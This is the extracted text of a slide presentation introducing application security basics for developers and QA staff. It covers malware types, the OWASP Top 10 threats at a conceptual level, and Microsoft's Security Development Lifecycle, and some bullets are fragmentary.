LinkedIn emplea cookies para mejorar la funcionalidad y el rendimiento de nuestro sitio web, así como para ofrecer publicidad relevante. Si continúas navegando por ese sitio web, aceptas el uso de cookies. Consulta nuestras Condiciones de uso y nuestra Política de privacidad para más información.
LinkedIn emplea cookies para mejorar la funcionalidad y el rendimiento de nuestro sitio web, así como para ofrecer publicidad relevante. Si continúas navegando por ese sitio web, aceptas el uso de cookies. Consulta nuestra Política de privacidad y nuestras Condiciones de uso para más información.
This presentation is part of one of talk, I gave in Microsoft .NET Bootcamp. The contents are slightly edited to share the information in public domain. In this presentation, I tried to cover broader aspects of Application Security basics. This presentation will be useful for software architects/Managers,developers and QAs. Do share your feedback in comments.
Social engineering. Many attacks attempt to appear as if they originated from a system administrator or official service, increasing the likelihood that end users will execute them and infect their systems.Trojan horse. A program that appears to be useful or harmless but that contains hidden code designed to exploit or damage the system on which it is run. Trojan horse programs are most commonly delivered to users through e-mail messages that misrepresent the program's purpose and function. Also called Trojan code. A Trojan horse does this by delivering a malicious payload or task when it is run.Worm. A worm uses self-propagating malicious code that can automatically distribute itself from one computer to another through network connections. A worm can take harmful action, such as consuming network or local system resources, possibly causing a denial of service attack. Some worms can execute and spread without user intervention, while others require users to execute the worm code directly in order to spread. Worms may also deliver a payload in addition to replicating.Virus. A virus uses code written with the express intention of replicating itself. A virus attempts to spread from computer to computer by attaching itself to a host program. It may damage hardware, software, or data. When the host is executed, the virus code also runs, infecting new hosts and sometimes delivering an additional payload.
- Now we no longer have websites, we have web applications - Web applications reside on multiple systems in distributed architectures - Three tiers (presentation, logic, data) - Use sophisticated programming languages and architectures - Corporate and customer data moved to the computing edge - Edge extended to cellphones, pda’s, mobile sales force solutions, inventory management systems, etc.
There is a lack of awareness of application vulnerabilities in security departments.Security Departments scrutinize the desktop, the network, and even the web servers, but the web application escapes their measures. Even in departments that want to audit for web application vulnerabilities, the lack of effective tools has made it impractical As a result, Certification and Accreditation programs rarely examine the web applicationIn fact, the entire development cycle is usually missing from security procedures and controlsThis illustrates the fundamental gap between security and development, which creates these web application vulnerabilitiesMany traditional information security practitioners are ill-equipped tomitigate application security issues– Little to no experience coding– No experience coding in “modern” enterprise environments like .NET and J2EE– Understand that there are risks, but not in a position to address them
Application Security-Understanding The Horizon
Understanding The Horizon
Foundations of Security
Layered Security Approach
Importance of Application Security
OWASP Top 10 Threats
Bridging The Gap-Step by Step
Microsoft Security Lifecycle Development (MS-SDL)
Measurable results of applying MS-SDL
Why you should know hacking?
Developers need to hone their cyber-offence skills
Hack your own website
If you can’t think like hacker, it's difficult to defend against them
First website security assessment
Defense in depth
Fix multiple security flaws that would otherwise have been single point of
Who are hackers?
Motivated for higher cause
Motivated for financial gain, identity theft, malicious intentions
Cyber warfare for national security and political interest
Social Media Websites/Portals
Your security “perimeter” has huge
holes at the application layer
We are secure since we have a firewall !
You can’t use
(firewall, SSL, IDS,
to stop or detect
Common Sources of Untrusted Data
• In URL via a query string or route
• Posted via a form
• Request Headers
• External Services
• Your own database!
Building A Risk Profile
Attackers wants to understand as much as possible about the
website in order to find out vulnerabilities in website. So analyzes
What are points of untrusted data entry?
• What sanitation practices have been employed?
• What framework and libraries the website is running on?
• What can be discovered about site structure?
• What can be used from “view source” option of browsers?
• Are there any useful internal error messages up to the browser?
• Are there sufficient access controls on diagnostic data?
Information security, is the practice of
defending information from unauthorized
access, use, disclosure, disruption, modification,
perusal, inspection, recording or destruction.”
Foundations of Application Security
Authentication= (Who are you?)
Authorization=(What can you do?)
Auditing(Non-repudiation) =Can not deny your action
Confidentiality(Privacy)=Data remains private and confidential
Integrity=Data is protected
Availability=System remains available
Attacks are focusing on applications
Operating system vs browser and application vulnerabilities
From the Microsoft Security Intelligence Report V7
Sources: IBM X-Force, 2008
Importance of Application Security
Web applications have largest number of vulnerabilities.
Sources: Sept 2009 Report with data from TippingPoint IPS and vulnerability data by Qualys.
Web Applications Complexity
Very complex architectures, multiple platforms and protocols
Web Applications Breach Perimeter
Allows HTTP port 80
Allows HTTPS port 443
on the web
server to talk to
Firewall only allows
to talk to database
OWASP Top 10 Threats
Attacker can manipulate queries to the DB /
LDAP / Other system
Hackers can access backend database information, alter it or steal
Broken Authentication & Session Management
Session tokens not guarded or invalidated
Hacker can “force” session token on victim; session tokens can be
stolen after logout
Cross Site scripting
Identity Theft, Sensitive Information Leakage,
Hackers can impersonate legitimate users, and control their
Insecure Direct Object Reference
Attacker can access sensitive files and
Web application returns contents of sensitive file (instead of
Attackers can gain detailed system
Malicious system investigation may assist in developing further
Sensitive Data Exposure
Sensitive info sent unencrypted over insecure
Unencrypted credentials “sniffed” and used by hacker to
Missing Function Level Access Control
Attacker can access unauthorized resources
Hacker can forcefully browse and access a page past the login
Cross-Site Request Forgery
Attacker can invoke “blind” actions on web
applications, impersonating as a trusted user
Blind requests to bank account transfer money to hacker
Using Components with Known Vulnerabilities
Attacker can exploit vulnerable component
to gain access to system
Attacker can do data loss and also perform server takeover.
Unvalidated Redirects and Forwards
Attacker can redirects victims to phishing sites
Attacker can redirects victims to phishing or malware sites or use
forwards to access unauthorized pages
Application Developers and QA
“As a Network Security Professional, I
don’t know how my companies web
applications are supposed to work so I
deploy a protective solution…but
don’t know if it’s protecting what it’s
“As an Application Developer, I can
build/test great features and functions
while meeting deadlines, but I don’t
know how to develop/test my web
application with security as a feature.”
Bridging The Gap-Step by Step
Prioritize application security as important non functional
Improve awareness of application security in developers and QAs.
Incorporate security in SDLC.
Define clear role and responsibility towards application security
Promote Penetration testing of application
Microsoft Security Development Lifecycle
Administer and track
Guide product teams to
meet SDL requirements
Establish release criteria and
sign-off as part of FSR
Ongoing Process Improvements
Measurable results: Microsoft SDL and
Disclosed One Year
45% reduction in Vulnerabilities
Source: Windows Vista One Year Vulnerability Report, Microsoft Security Blog 23 Jan 2008
Measurable results: Microsoft SDL and SQL
Total Vulnerabilities Disclosed
36 Months After Release
SQL Server 2000
91% reduction in Vulnerabilities
Sources: Analysis by Jeff Jones (Microsoft technet security blog)
SQL Server 2005
Competing commercial DB
OWASP (Open Web Application Security Project):
This presentation is shared under Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International license. More information for this license is available at http://creativecommons.org/licenses/by-nc-sa/4.0/
All trademarks are the property of their respective owners. Lalit Kale makes no warranties, express, implied or statutory, as to the information in this presentation.